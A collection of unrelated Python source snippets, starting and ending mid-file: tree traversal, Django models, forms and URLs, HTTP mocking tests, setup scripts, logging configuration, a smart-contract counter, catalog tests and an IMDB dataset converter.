        def dfs(tree):
            if tree:
                yield from dfs(tree.left)
                yield tree.val
                yield from dfs(tree.right)

        res = cur = TreeNode()
        for x in dfs(root):
            cur.right = TreeNode(x)
            cur = cur.right
        return res.right

    def increasingBST3(self, root):
        """Relink the existing nodes in place during the in-order walk.

        O(n) time, O(h) recursion stack, allocates only the dummy head.
        """
        def dfs(tree):
            if tree:
                dfs(tree.left)
                tree.left = None       # detach: result has no left children
                self.cur.right = tree  # append node to the growing chain
                self.cur = tree
                dfs(tree.right)

        res = self.cur = TreeNode()
        dfs(root)
        return res.right
|
from swag_client.migrations.versions import v2
def run_migration(data, version_start, version_end):
    """Runs migration against a data set.

    1 -> 2 upgrades every account; 2 -> 1 downgrades every item; any other
    version pair yields an empty account list.
    """
    if version_start == 1 and version_end == 2:
        migrated = [v2.upgrade(account) for account in data['accounts']]
    elif version_start == 2 and version_end == 1:
        migrated = [v2.downgrade(account) for account in data]
    else:
        migrated = []
    return {'accounts': migrated}
|
from django.db import models
import datetime as dt
from cloudinary.models import CloudinaryField
from django.contrib.auth.models import User
from django.urls import reverse
from django.db.models.signals import post_save
# Create your models here.
class FlashCards(models.Model):
    """A user-owned flash card with optional image/category metadata."""
    title = models.CharField(max_length=50, blank=True, null=True)
    name = models.CharField(max_length =30)
    # Deleting the owning user cascades to their cards.
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="flashcards", blank=True,null=True)
    description = models.TextField(max_length =200, blank=True, null=True)
    pub_date = models.DateTimeField(auto_now_add=True, blank=True, null=True)
    category = models.CharField(max_length=200, blank=True, null=True)
    image = models.ImageField(upload_to='media/', blank=True, null=True, default='default.jpg')
    images = CloudinaryField('images')

    def __str__(self):
        """Human-readable card name."""
        return str(self.name)

    def save_flash_cards(self):
        """Persist this card (thin wrapper around Model.save)."""
        self.save()

    def delete_flash_cards(self):
        """Remove this card (thin wrapper around Model.delete)."""
        self.delete()

    @classmethod
    def update_flash_cards(cls, id, value):
        """Rename the card with primary key *id* to *value*."""
        cls.objects.filter(id=id).update(name = value)

    def get_absolute_url(self):
        """Redirect target used after create/update: the site index."""
        return reverse('index')
|
# Load in our dependencies
from unittest import TestCase
import httpretty
import requests
import httpretty_fixtures
# Set up multiple fixture managers
class FakeServer(httpretty_fixtures.FixtureManager):
    """Fixture manager with two static endpoints on localhost:9000."""
    @httpretty_fixtures.get('http://localhost:9000/')
    def hello(self, request, uri, res_headers):
        # httpretty callback contract: (status, headers, body).
        return (200, res_headers, 'world')

    @httpretty_fixtures.get('http://localhost:9000/goodbye')
    def goodbye(self, request, uri, res_headers):
        return (200, res_headers, 'moon')
class CounterServer(httpretty_fixtures.FixtureManager):
    """Stateful fixture manager: replies with how many hits it has seen."""
    def __init__(self):
        # Per-instance hit counter, bumped by every `counter` request.
        self.count = 0
        super(CounterServer, self).__init__()

    @httpretty_fixtures.get('http://localhost:9000/')
    def counter(self, request, uri, res_headers):
        self.count += 1
        return (200, res_headers, str(self.count))
# Define our tests
class TestHttprettyFixtures(TestCase):
    """Integration tests for httpretty_fixtures' FixtureManager."""

    @FakeServer.run(['hello'])
    def test_request(self, fake_server):
        """
        A request to a non-existent server behind a running FixtureManager
            receives a response from FixtureManager
            collects the request for later access
        """
        # Make our request
        res = requests.get('http://localhost:9000/')
        self.assertEqual(res.status_code, 200)
        # Assert the content is as expected
        self.assertEqual(res.text, 'world')
        # Assert we have information in our requests from `httpretty` context
        self.assertEqual(httpretty_fixtures.first_request().path, '/')
        self.assertEqual(httpretty_fixtures.last_request().path, '/')
        self.assertEqual(len(httpretty_fixtures.requests()), 1)
        self.assertEqual(httpretty_fixtures.requests()[0].path, '/')
        # Assert we have information in our requests from fixture context
        fixture = fake_server.hello
        self.assertEqual(fixture.first_request.path, '/')
        self.assertEqual(fixture.last_request.path, '/')
        self.assertEqual(len(fixture.requests), 1)
        self.assertEqual(fixture.requests[0].path, '/')

    @FakeServer.run(['hello'])
    def test_multiple_requests(self, fake_server):
        """
        Multiple requests to a running FixtureManager
            collects separate requests
        """
        # Make our request
        res = requests.get('http://localhost:9000/?first')
        self.assertEqual(res.status_code, 200)
        res = requests.get('http://localhost:9000/?second')
        self.assertEqual(res.status_code, 200)
        # Assert we have information in our requests from `httpretty` context
        self.assertEqual(httpretty_fixtures.first_request().path, '/?first')
        self.assertEqual(httpretty_fixtures.last_request().path, '/?second')
        self.assertEqual(len(httpretty_fixtures.requests()), 2)
        self.assertEqual(httpretty_fixtures.requests()[0].path, '/?first')
        self.assertEqual(httpretty_fixtures.requests()[1].path, '/?second')
        # Assert we have information in our requests from fixture context
        fixture = fake_server.hello
        self.assertEqual(fixture.first_request.path, '/?first')
        self.assertEqual(fixture.last_request.path, '/?second')
        self.assertEqual(len(fixture.requests), 2)
        self.assertEqual(fixture.requests[0].path, '/?first')
        self.assertEqual(fixture.requests[1].path, '/?second')

    @FakeServer.run(['hello', 'goodbye'])
    def test_multiple_fixtures_requests(self, fake_server):
        """
        Requests to a running FixtureManager for different fixtures
            receive response from appropriate endpoint
            collects separate requests
        """
        # Make our requests
        res1 = requests.get('http://localhost:9000/?first')
        self.assertEqual(res1.status_code, 200)
        self.assertEqual(res1.text, 'world')
        res2 = requests.get('http://localhost:9000/goodbye?second')
        self.assertEqual(res2.status_code, 200)
        self.assertEqual(res2.text, 'moon')
        # Assert we have information in our requests from `httpretty` context
        self.assertEqual(httpretty_fixtures.first_request().path, '/?first')
        self.assertEqual(httpretty_fixtures.last_request().path, '/goodbye?second')
        self.assertEqual(len(httpretty_fixtures.requests()), 2)
        self.assertEqual(httpretty_fixtures.requests()[0].path, '/?first')
        self.assertEqual(httpretty_fixtures.requests()[1].path, '/goodbye?second')
        # Assert we have information in our requests from fixture context
        fixture1 = fake_server.hello
        self.assertEqual(fixture1.first_request.path, '/?first')
        self.assertEqual(fixture1.last_request.path, '/?first')
        self.assertEqual(len(fixture1.requests), 1)
        self.assertEqual(fixture1.requests[0].path, '/?first')
        fixture2 = fake_server.goodbye
        self.assertEqual(fixture2.first_request.path, '/goodbye?second')
        self.assertEqual(fixture2.last_request.path, '/goodbye?second')
        self.assertEqual(len(fixture2.requests), 1)
        self.assertEqual(fixture2.requests[0].path, '/goodbye?second')

    @CounterServer.run(['counter'])
    def test_state_preserved(self, counter_server):
        """
        Multiple stateful requests to a running FixtureManager
            receive appropriate state
        """
        # Make our first request and verify its count
        res = requests.get('http://localhost:9000/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, '1')
        # Make our second request and verify its count
        res = requests.get('http://localhost:9000/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, '2')

    @CounterServer.run(['counter'])
    def test_state_disjoint(self, counter_server):
        """
        A separately running FixtureManager
            does not receive state from past runs
        """
        # Verifies that we don't get bleed from `test_state_preserved`
        res = requests.get('http://localhost:9000/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, '1')

    def test_nesting(self):
        """
        When nesting calls to FixtureManager.start
            we keep HTTPretty enabled until the last FixtureManager is stopped
        """
        # We have not started yet
        self.assertEqual(httpretty.is_enabled(), False)
        # Start one manager, we get a `nested_count = 1`
        CounterServer.start(['counter'])
        self.assertEqual(httpretty.is_enabled(), True)
        # Start a second manager, we get a `nested_count = 2`
        FakeServer.start(['hello'])
        self.assertEqual(httpretty.is_enabled(), True)
        # We stop the second manager, which gets us `nested_count = 1`
        # As well, HTTPretty should still be running
        FakeServer.stop()
        self.assertTrue(httpretty.is_enabled())
        # We stop our last manager, which gives us `nested_count = 0`
        CounterServer.stop()
        # We finally stop HTTPretty since the last fixture manager is stopped
        self.assertFalse(httpretty.is_enabled())

    def test_httpretty_enabled_outside_fixture_manager(self):
        """
        When HTTPretty was started outside of FixtureManager
            we do not disable HTTPretty when the last FixtureManager is stopped
        """
        # Start HTTPretty manually
        httpretty.enable()
        self.assertEqual(httpretty.is_enabled(), True)
        # Start one of our FixtureManagers
        FakeServer.start(['hello'])
        self.assertEqual(FakeServer.httpretty_enabled_at_start, True)
        self.assertEqual(httpretty.is_enabled(), True)
        # Stop our FixtureManager and ensure HTTPretty is still running
        FakeServer.stop()
        self.assertEqual(FakeServer.nested_count, 0)
        self.assertEqual(httpretty.is_enabled(), True)
        # Disable HTTPretty manually and ensure it is stopped
        httpretty.disable()
        self.assertEqual(httpretty.is_enabled(), False)
|
from setuptools import setup, find_packages
# Package metadata for the ci-metric-push distribution.
setup(
    name="ci-metric-push",
    version="0.1",
    packages=find_packages(),
    scripts=['pushci'],
    install_requires=[
        'librato-metrics==0.4.11',
        'docopt==0.6.2',
        'PyYAML==3.11',
        'coloredlogs==0.5',
    ],
    author="Tomaz Kovacic",
    author_email="tomaz.kovacic@gmail.com",
    description="Push metrics about your code from your CI container to [ librato | statsd | ...] ",
    license="MIT",
    keywords="ci metric push",
    url="https://github.com/tomazk/ci-metric-push",  # project home page, if any
)
# Generated by Django 2.0.2 on 2020-08-17 02:47
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: newest-first ordering and Spanish verbose names."""

    dependencies = [
        ('services', '0001_initial'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='services',
            options={'ordering': ['-created'], 'verbose_name': 'Servicio', 'verbose_name_plural': 'Servicios'},
        ),
        migrations.AlterField(
            model_name='services',
            name='content',
            field=models.TextField(verbose_name='Contenido'),
        ),
    ]
|
def normalize_RTL(src: str):
    """Return *src*; when it contains any non-ASCII character, append a
    parenthesized reversed copy so RTL (e.g. Hebrew) titles stay readable.
    """
    if src.isascii():
        return src
    return '{} ({})'.format(src, src[::-1])
# Punctuation allowed to survive scrubbing, besides alphanumerics.
_safe_chars = frozenset(" ._,-'")


def safe_filename(src: str):
    """Scrub a filename: every character that is neither alphanumeric nor in
    the small safe-punctuation whitelist becomes a space; the result is then
    stripped of leading/trailing whitespace.
    """
    scrubbed = [ch if ch.isalnum() or ch in _safe_chars else ' ' for ch in src]
    return ''.join(scrubbed).strip()
|
#!/usr/bin/env python3
from setuptools import setup
# The README doubles as the PyPI long description.
with open('README.md') as readme_file:
    readme = readme_file.read()

setup(
    name='stringcontext',
    version='1.0.0',
    description='Get the context around an index location in a string',
    long_description=readme,
    long_description_content_type='text/markdown',
    url='https://github.com/wesinator/stringcontext',
    author='wesinator',
    author_email='13hurdw@gmail.com',
    packages=['stringcontext'],
    classifiers=[
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: English',
        'Programming Language :: Python :: 3',
    ],
    zip_safe=True,
)
|
#!/usr/bin/env python3
import sys
import os
# Human-readable project name.
PROJECT_TITLE = "PoliRural: Contributions"
# Project root: two directory levels above this settings file.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


def rel(*x):
    """Join path components relative to the project base directory."""
    return os.path.join(BASE_DIR, *x)
# Ensure the logging directory exists.
LOG_DIR_NAME = 'log'
LOG_DIR = rel(LOG_DIR_NAME)
# exist_ok avoids the check-then-create race of the previous
# `if not os.path.exists(...)` guard (two processes starting at once).
os.makedirs(LOG_DIR, exist_ok=True)
# Loggers — dictConfig-style logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        # Full detail: module, logger name, function and line number.
        'verbose': {
            'format': "[%(asctime)s %(levelname)s] [%(module)s.%(name)s %(funcName)s:%(lineno)s] %(message)s",
            'datefmt': "%Y-%m-%d %H:%M:%S %z",
        },
        'semiverbose': {
            'format': "[%(asctime)s %(levelname)s] [%(funcName)s] %(message)s",
            'datefmt': "%Y-%m-%d %H:%M:%S %z",
        },
        'standard': {
            'format': "[%(asctime)s %(levelname)s] %(message)s",
            'datefmt': "%Y-%m-%d %H:%M:%S %z",
        },
        # Like 'standard' but with a time-only timestamp (console use).
        'simple': {
            "format" : "[%(asctime)s %(levelname)s] %(message)s",
            'datefmt': "%H:%M:%S %z",
        }
    },
    'filters': {},
    'handlers': {
        'console': {
            'class': 'logging.StreamHandler',
            'formatter': 'simple',
            'level': 'DEBUG',
        },
        # Rotating application log, capped at 5 MB with one backup.
        'default': {
            'level': 'DEBUG',
            'class': 'logging.handlers.RotatingFileHandler',
            'filename': rel('log', 'app.log'),
            'maxBytes': 1024*1024*5,  # 5 MB
            'backupCount': 1,
            'formatter': 'standard',
        },
        # Rotating error log with the verbose formatter.
        'error': {
            'level': 'DEBUG',
            'class': 'logging.handlers.RotatingFileHandler',
            'filename': rel('log', 'error.log'),
            'maxBytes': 1024*1024*20,  # 20 MB
            'backupCount': 1,
            'formatter': 'verbose',
        },
    },
    'root': {
        'handlers': ['console'],
        'level': 'DEBUG'
    },
    'loggers': {
        'default': {
            'handlers': ['default'],
            'level': 'DEBUG',
            'propagate': False,
        },
        'error': {
            'handlers': ['error'],
            'level': 'DEBUG',
            'propagate': False,
        },
        'console': {
            'handlers': ['console'],
            'level': 'DEBUG',
            'propagate': False,
        },
    }
}
|
"""
Application settings
"""
from .config.db import db
from .config.flask import Config
from .router import * |
from boa.blockchain.vm.Neo.Runtime import Notify
from pkg.models.storage import Storage
class Counter():
    """Persistent counter held in contract storage under a fixed key."""
    KEY = 'counter'

    def get(self) -> int:
        """Return the stored counter value, defaulting to 0 when unset."""
        Notify('Counter.get triggered.')
        storage = Storage()
        result = storage.get(self.KEY)
        # `== None` kept on purpose: this is boa smart-contract code and
        # the boa compiler may not support `is None` — TODO confirm before
        # changing.  (An unreachable duplicate `return result` after this
        # if/else has been removed.)
        if (result == None):
            return 0
        else:
            return result

    def up(self) -> None:
        """Increment the stored counter by one."""
        Notify('Counter.up triggered.')
        current_count = self.get()
        new_count = current_count + 1
        storage = Storage()
        storage.put(self.KEY, new_count)
        return None

    def down(self) -> None:
        """Decrement the stored counter by one."""
        Notify('Counter.down triggered.')
        current_count = self.get()
        new_count = current_count - 1
        storage = Storage()
        storage.put(self.KEY, new_count)
        return None
|
from pyDS.stack import Stack
import unittest
class TestStack(unittest.TestCase):
    """Unit tests for pyDS.stack.Stack."""

    def setUp(self):
        # Fresh, empty stack for every test.
        self.stack = Stack()

    def test_empty_stack(self):
        self.assertTrue(self.stack.isEmpty())

    def test_stack_push(self):
        self.stack.push(2)
        # NOTE(review): asserts against the private `_items` backing list.
        self.assertEqual(self.stack._items, [2])

    def test_non_empty_stack(self):
        self.stack.push(5)
        self.assertFalse(self.stack.isEmpty())

    def test_stack_length(self):
        self.stack.push(2)
        self.assertEqual(len(self.stack), 1)

    def test_stack_peek(self):
        self.stack.push(2)
        self.assertEqual(self.stack.peek(), 2)

    def test_stack_pop(self):
        self.stack.push(2)
        self.assertEqual(self.stack.pop(), 2)

    def test_empty_stack_pop(self):
        # pop() on an empty stack must raise ValueError.
        with self.assertRaises(ValueError):
            self.stack.pop()

    def test_empty_stack_peek(self):
        # peek() on an empty stack must raise ValueError.
        with self.assertRaises(ValueError):
            self.stack.peek()

    def test_stack_str_representation(self):
        self.stack.push(2)
        self.stack.push(4)
        # Bottom-to-top, space separated.
        self.assertEqual(str(self.stack),"2 4")
|
from django.conf.urls import url
from . import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
    url(r'^$', views.index, name='home'),
    # NOTE(review): several patterns below are unanchored at the end
    # (no trailing `$`), so longer paths also match — confirm intended.
    url(r'^user/(?P<username>\w+)', views.profile, name='profile'),
    url(r'^upload/$', views.upload_image, name='upload_image'),
    url(r'^accounts/edit/',views.edit_profile, name='edit_profile'),
    url(r'^image/(?P<image_id>\d+)', views.single_image, name='single_image'),
    url(r'^search/', views.search, name='search'),
    url(r'^like/(?P<operation>.+)/(?P<pk>\d+)',views.like, name='like'),
    url(r"^profile/update/$", views.update_profile, name = "update_profile"),
    url(r"^accounts/profile/$",views.index, name = 'home')
]

# Serve user-uploaded media through Django only while DEBUG is on.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
import os
import logging
import json
from zinc.models import ZincIndex, ZincManifest, ZincFlavorSpec
from zinc.catalog import ZincCatalogPathHelper
from zinc.defaults import defaults
from zinc.catalog import ZincCatalog
from zinc.storages import StorageBackend
from zinc.client import connect, create_bundle_version
import zinc.helpers as helpers
import zinc.utils as utils
from tests import *
# TODO: relocate
class StorageBackendTestCase(unittest.TestCase):
    """The abstract StorageBackend must refuse every operation."""

    def setUp(self):
        self.storage = StorageBackend()

    def test_get_raises(self):
        with self.assertRaises(NotImplementedError):
            self.storage.get('foo')

    def test_get_meta_raises(self):
        with self.assertRaises(NotImplementedError):
            self.storage.get_meta('foo')

    def test_put_raises(self):
        with self.assertRaises(NotImplementedError):
            self.storage.put('foo', 'bar')
def create_catalog_at_path(path, id):
    """Create a catalog with *id* at *path* and return a handle to it."""
    service = connect('/')
    service.create_catalog(id=id, loc=path)
    return service.get_catalog(loc=path)
class ZincCatalogPathHelperTestCase(unittest.TestCase):
    """Path layout conventions produced by ZincCatalogPathHelper.

    Uses assertEqual throughout: assertEquals is a deprecated alias
    (removed in Python 3.12).
    """

    def setUp(self):
        self.pathHelper = ZincCatalogPathHelper()

    def test_config_dir(self):
        self.assertEqual(self.pathHelper.config_dir, "config")

    def test_config_flavors_spec_dir(self):
        self.assertEqual(self.pathHelper.config_flavorspec_dir, "config/flavorspecs")

    def test_path_for_flavor_spec_name(self):
        flavor_spec_name = "games"
        expected_path = "config/flavorspecs/%s.json" % flavor_spec_name
        actual_path = self.pathHelper.path_for_flavorspec_name(flavor_spec_name)
        self.assertEqual(expected_path, actual_path)
class ZincCatalogTestCase(TempDirTestCase):
    """End-to-end tests for ZincCatalog against an on-disk catalog.

    Fixes relative to the previous version: deprecated assertEquals /
    assertNotEquals aliases replaced with assertEqual / assertNotEqual
    (aliases removed in Python 3.12), and test_create_bundle_with_subdirs
    no longer passes os.mkdir()'s None return value to create_random_file.
    """

    def setUp(self):
        super(ZincCatalogTestCase, self).setUp()
        self.catalog_dir = os.path.join(self.dir, "catalog")
        os.mkdir(self.catalog_dir)
        self.scratch_dir = os.path.join(self.dir, "scratch")
        os.mkdir(self.scratch_dir)
        logging.info("catalog: %s" % self.catalog_dir)
        logging.info("scratch: %s" % self.scratch_dir)

    def path_exists_in_catalog(self, subpath):
        """True when *subpath* exists under the catalog directory."""
        fullpath = os.path.join(self.catalog_dir, subpath)
        return os.path.exists(fullpath)

    def test_catalog_create(self):
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        self.assertTrue(catalog is not None)
        self.assertTrue(len(catalog.index.bundle_names()) == 0)
        self.assertTrue(catalog.format() == defaults['zinc_format'])

    def test_catalog_read_invalid_format(self):
        create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        index_path = os.path.join(self.catalog_dir, defaults['catalog_index_name'])
        index = ZincIndex.from_path(index_path)
        # Corrupt the on-disk format marker, then expect the load to fail.
        index._format = 2
        index.write(index_path)
        self.assertRaises(Exception, ZincCatalog, (self.catalog_dir))

    def test_catalog_import_file(self):
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        f1 = create_random_file(self.scratch_dir)
        catalog.import_path(f1)

    def test_bundle_names_with_no_bundles(self):
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        self.assertTrue(len(catalog.index.bundle_names()) == 0)

    def test_versions_for_nonexistant_bundle(self):
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        versions = catalog.index.versions_for_bundle("meep")
        self.assertTrue(len(versions) == 0)

    def _build_test_catalog(self):
        """Catalog with one bundle "meep" at version 1 (two random files)."""
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        create_random_file(self.scratch_dir)
        create_random_file(self.scratch_dir)
        create_bundle_version(catalog, "meep", self.scratch_dir)
        catalog._reload()  # TODO: fix/remove/something
        return catalog

    def test_create_bundle_version(self):
        catalog = self._build_test_catalog()
        self.assertTrue("meep" in catalog.get_index().bundle_names())
        self.assertTrue(1 in catalog.get_index().versions_for_bundle("meep"))
        manifest = catalog.manifest_for_bundle("meep", 1)
        self.assertTrue(manifest is not None)
        # Every file listed in the manifest must exist as a catalog object.
        for (file, props) in manifest.files.items():
            sha = props['sha']
            formats = props['formats']
            for format in formats.keys():
                ext = None
                if format == 'gz':
                    ext = 'gz'
                object_path = ZincCatalogPathHelper().path_for_file_with_sha(sha, ext)
                self.assertTrue(self.path_exists_in_catalog(object_path))

    def test_bundle_name_in_manifest(self):
        catalog = self._build_test_catalog()
        bundle_name = "meep"
        manifest = catalog.manifest_for_bundle(bundle_name, 1)
        self.assertTrue(manifest.bundle_name == bundle_name)

    def test_create_bundle_with_subdirs(self):
        create_random_file(self.scratch_dir)
        # BUG FIX: os.mkdir() returns None, so the old code handed None to
        # create_random_file(); build the path first, then create the dir.
        one_dir = os.path.join(self.scratch_dir, "one")
        os.mkdir(one_dir)
        create_random_file(one_dir)
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        create_bundle_version(catalog, "meep", self.scratch_dir)

    def test_create_second_bundle_version(self):
        catalog = self._build_test_catalog()
        # add a file
        create_random_file(self.scratch_dir)
        create_bundle_version(catalog, "meep", self.scratch_dir)
        self.assertTrue(2 in catalog.get_index().versions_for_bundle("meep"))
        new_index = ZincIndex.from_path(os.path.join(catalog.path, defaults['catalog_index_name']))
        self.assertTrue(1 in new_index.versions_for_bundle("meep"))
        self.assertTrue(2 in new_index.versions_for_bundle("meep"))

    def test_create_duplicate_bundle_version_no_force(self):
        catalog = self._build_test_catalog()
        # add a file
        create_random_file(self.scratch_dir)
        # create first version
        manifest1 = create_bundle_version(catalog, "meep", self.scratch_dir)
        self.assertTrue(2 in catalog.get_index().versions_for_bundle("meep"))
        # attempt to create same version again
        manifest2 = create_bundle_version(catalog, "meep", self.scratch_dir)
        self.assertEqual(manifest1.version, manifest2.version)

    def test_create_duplicate_bundle_version_with_force(self):
        catalog = self._build_test_catalog()
        # add a file
        create_random_file(self.scratch_dir)
        # create first version
        manifest1 = create_bundle_version(catalog, "meep", self.scratch_dir)
        self.assertTrue(2 in catalog.get_index().versions_for_bundle("meep"))
        # attempt to create same version again, with force
        manifest2 = create_bundle_version(catalog, "meep", self.scratch_dir,
                                          force=True)
        self.assertNotEqual(manifest1.version, manifest2.version)

    def test_create_identical_bundle_version(self):
        catalog = self._build_test_catalog()
        create_bundle_version(catalog, "meep", self.scratch_dir)
        self.assertEqual(len(catalog.get_index().versions_for_bundle("meep")), 1)

    def test_path_for_manifest_with_name_version(self):
        catalog = self._build_test_catalog()
        manifest = ZincManifest(catalog.index.id, 'zoo', 1)
        path = ZincCatalogPathHelper().path_for_manifest(manifest)
        filename = os.path.split(path)[-1]
        self.assertEqual(filename, 'zoo-1.json')

    def test_single_file_bundle_does_not_create_archive(self):
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        create_random_file(self.scratch_dir)
        create_bundle_version(catalog, "meep", self.scratch_dir)
        archive_path = ZincCatalogPathHelper().path_for_archive_for_bundle_version("meep", 1)
        self.assertFalse(self.path_exists_in_catalog(archive_path))

    def test_more_than_one_file_bundle_does_create_archive(self):
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        create_random_file(self.scratch_dir)
        create_random_file(self.scratch_dir)
        create_bundle_version(catalog, "meep", self.scratch_dir)
        archive_path = ZincCatalogPathHelper().path_for_archive_for_bundle_version("meep", 1)
        self.assertTrue(self.path_exists_in_catalog(archive_path))

    def test_single_file_flavor_does_not_create_archive(self):
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        create_random_file(self.scratch_dir)
        flavor_spec = ZincFlavorSpec.from_dict({'dummy': ['+ *']})
        create_bundle_version(catalog, "meep", self.scratch_dir,
                              flavor_spec=flavor_spec)
        archive_path = ZincCatalogPathHelper().path_for_archive_for_bundle_version("meep", 1,
                                                                                   flavor='dummy')
        self.assertFalse(self.path_exists_in_catalog(archive_path))

    def test_skip_master_archive_and_no_flavor_specified(self):
        # Without flavors the master archive must be built regardless.
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        create_random_file(self.scratch_dir)
        create_random_file(self.scratch_dir)
        create_bundle_version(catalog, "meep", self.scratch_dir,
                              skip_master_archive=True)
        archive_path = ZincCatalogPathHelper().path_for_archive_for_bundle_version("meep", 1)
        self.assertTrue(self.path_exists_in_catalog(archive_path))

    def test_skip_master_archive_and_flavor_specified(self):
        catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
        create_random_file(self.scratch_dir)
        create_random_file(self.scratch_dir)
        flavor_spec = ZincFlavorSpec.from_dict({'dummy': ['+ *']})
        create_bundle_version(catalog, "meep", self.scratch_dir,
                              flavor_spec=flavor_spec, skip_master_archive=True)
        archive_path = ZincCatalogPathHelper().path_for_archive_for_bundle_version("meep", 1)
        self.assertFalse(self.path_exists_in_catalog(archive_path))

    def test_update_distro_basic(self):
        # set up
        catalog = self._build_test_catalog()
        bundle_name, distro = "meep", "master"
        # create 'master' distro at v1
        catalog.update_distribution(distro, bundle_name, 1)
        # verify
        version = catalog.index.version_for_bundle(bundle_name, distro)
        self.assertEqual(version, 1)

    def test_save_prev_distro_if_no_previous(self):
        # set up
        catalog = self._build_test_catalog()
        bundle_name, distro = "meep", "master"
        # create 'master' distro at v1
        catalog.update_distribution(distro, bundle_name, 1)
        # verify
        prev_distro = helpers.distro_previous_name(distro)
        prev_version = catalog.index.version_for_bundle(bundle_name, prev_distro)
        self.assertTrue(prev_version is None)

    def test_save_prev_distro_if_prev_exists(self):
        # set up
        catalog = self._build_test_catalog()
        bundle_name, distro = "meep", "master"
        # create 'master' distro at v1
        catalog.update_distribution(distro, bundle_name, 1)
        # create a bundle version 2
        create_random_file(self.scratch_dir)
        create_bundle_version(catalog, bundle_name, self.scratch_dir)
        # update 'master' distro to v2
        catalog.update_distribution(distro, bundle_name, 2)
        # verify
        prev_distro = helpers.distro_previous_name(distro)
        prev_version = catalog.index.version_for_bundle(bundle_name, prev_distro)
        self.assertEqual(prev_version, 1)

    def add_dummy_flavorspec(self, catalog, flavorspec_name):
        """Write a trivial match-everything flavorspec into the catalog."""
        flavorspec_string = json.dumps({'dummy': ['+ *']})
        subpath = catalog.path_helper.path_for_flavorspec_name(flavorspec_name)
        # NOTE(review): `puts` (not `put`) — presumably the storage API's
        # string-put method; confirm against the storage backend.
        catalog._storage.puts(subpath, flavorspec_string)

    def test_update_flavorspec(self):
        # set up
        catalog = self._build_test_catalog()
        flavorspec_string = json.dumps({'dummy': ['+ *']})
        # add the flavorspec
        catalog.update_flavorspec_from_json_string("dummy", flavorspec_string)
        # verify
        expected_path = catalog._ph.path_for_flavorspec_name("dummy")
        self.path_exists_in_catalog(expected_path)

    def test_list_flavorspec(self):
        # set up
        catalog = self._build_test_catalog()
        self.add_dummy_flavorspec(catalog, "test")
        # get list
        actual_names = catalog.get_flavorspec_names()
        # verify
        self.assertEqual(["test"], actual_names)

    def test_delete_flavorspec(self):
        # set up
        catalog = self._build_test_catalog()
        self.add_dummy_flavorspec(catalog, "test")
        # delete flavorspec
        catalog.delete_flavorspec("test")
        # verify
        subpath = catalog.path_helper.path_for_flavorspec_name("test")
        self.assertFalse(os.path.exists(os.path.join(self.dir, subpath)))
|
import os
import re
import csv
def convert_directory_to_csv(directory, polarity, out_file_path):
    """Append one CSV row per review file found in *directory*.

    Each file is named like "<id>_<sentiment>.txt" and its entire content
    is the sentence.  Rows are (sentence, sentiment, polarity), appended
    to *out_file_path* (the header row is written by the caller).

    directory     -- folder containing the review .txt files
    polarity      -- class label for the third column (e.g. 0 or 1)
    out_file_path -- CSV file opened in append mode
    """
    # Raw string (avoids invalid-escape warnings) compiled once instead of
    # per file; the old unused `data` dict has been removed as dead code.
    name_re = re.compile(r"\d+_(\d+)\.txt")
    with open(out_file_path, "a") as csvfile:
        writer = csv.writer(csvfile)
        for file_path in os.listdir(directory):
            with open(os.path.join(directory, file_path), "r") as f:
                sentence = f.read()
            sentiment = name_re.match(file_path).group(1)
            writer.writerow([sentence, sentiment, str(polarity)])
def convert_dataset(directory):
    """Build resources/<directory>.csv: write the header, then append the
    positive (polarity 1) and negative (polarity 0) review folders.
    """
    out_path = os.path.join("resources", "{}.csv".format(directory))
    with open(out_path, "w") as csvfile:
        csv.writer(csvfile).writerow(["sentence", "sentiment", "polarity"])
    base = os.path.join("resources", "aclImdb", directory)
    convert_directory_to_csv(os.path.join(base, "pos"), 1, out_path)
    convert_directory_to_csv(os.path.join(base, "neg"), 0, out_path)
def main():
    """Convert both IMDB splits (train and test) to CSV."""
    convert_dataset("train")
    convert_dataset("test")


if __name__ == '__main__':
    main()
|
from django import forms
from .models import ShopOrder
class ShopOrderForm(forms.ModelForm):
    """Checkout form for ShopOrder with placeholder-styled, label-less inputs."""

    class Meta:
        model = ShopOrder
        fields = ('full_name', 'email_address', 'phone_number',
                  'address_line1', 'address_line2', 'town_or_city',
                  'county_or_region', 'postcode', 'country',)

    def __init__(self, *args, **kwargs):
        """Set placeholders and CSS class, autofocus the name, hide labels."""
        super().__init__(*args, **kwargs)
        placeholders = {
            'full_name': 'Full Name',
            'email_address': 'Email Address',
            'phone_number': 'Phone Number',
            'address_line1': 'Address Line 1',
            'address_line2': 'Address Line 2',
            'town_or_city': 'Town or City',
            'county_or_region': 'County or Region',
            'postcode': 'Postcode',
        }
        self.fields['full_name'].widget.attrs['autofocus'] = True
        for field in self.fields:
            # 'country' has no placeholder entry and keeps its default
            # select widget text.
            if field != 'country':
                # The previous code branched on `.required` but both
                # branches produced the identical string, so the branch is
                # collapsed.  (If required fields were meant to be marked,
                # e.g. with a trailing ' *', that was never applied —
                # TODO confirm intent.)
